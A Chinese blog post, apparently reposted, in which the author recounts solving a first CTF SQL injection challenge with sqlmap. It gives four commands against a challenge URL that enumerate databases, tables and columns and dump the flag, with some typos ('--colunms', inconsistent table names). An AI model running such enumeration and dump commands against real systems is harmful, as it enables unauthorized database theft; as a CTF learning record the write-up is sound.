欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

记录第一次使用sqlmap完成第一道SQL注入题

程序员文章站 2022-05-12 14:20:47
...

 第一次使用sqlmap,在网上搜了一下sql常用命令

 四个命令顺利拿下flag,看着终端代码跑起来没有发生错误确实挺爽的,写篇博客记录一下吧,毕竟是第一次使用sqlmap并且很顺利的做出第一道SQL注入题。

题目

记录第一次使用sqlmap完成第一道SQL注入题

 看到题目,很显然这是一道SQL注入题。

记录第一次使用sqlmap完成第一道SQL注入题
 打开链接,依次输入1,2,3,4,没有得到什么有效内容。直接打开Kali用sqlmap注入。

1、获取数据库

sqlmap -u http://49.234.224.119:7415/?id=1 --dbs

 一顿注入之后,得到五个数据库记录第一次使用sqlmap完成第一道SQL注入题
 看第一个数据库的名字,感觉flag在这里面的概率比较大。

2、列出geek_sql数据库中的表名

sqlmap -u http://49.234.224.119:7415/?id=1 -D geek_sql --tables

 得到两个表

记录第一次使用sqlmap完成第一道SQL注入题
 这下没啥悬念了,继续

3、列出flllag表中的字段名

sqlmap -u http://49.234.224.119:7415/?id=1 -D geek_sql -T fllllag --colunms

 得到两个字段名

记录第一次使用sqlmap完成第一道SQL注入题
 fllllllag.txt都出来了,离获取flag就差一步了!!!

4、获取fllllllag字段内容

sqlmap -u http://49.234.224.119:7415/?id=1 -D geek_sql -T fllllag -C fllllllag --dump

 得到flag

记录第一次使用sqlmap完成第一道SQL注入题

总结

 没有什么技术含量,就是记录一下第一次做出sql注入题。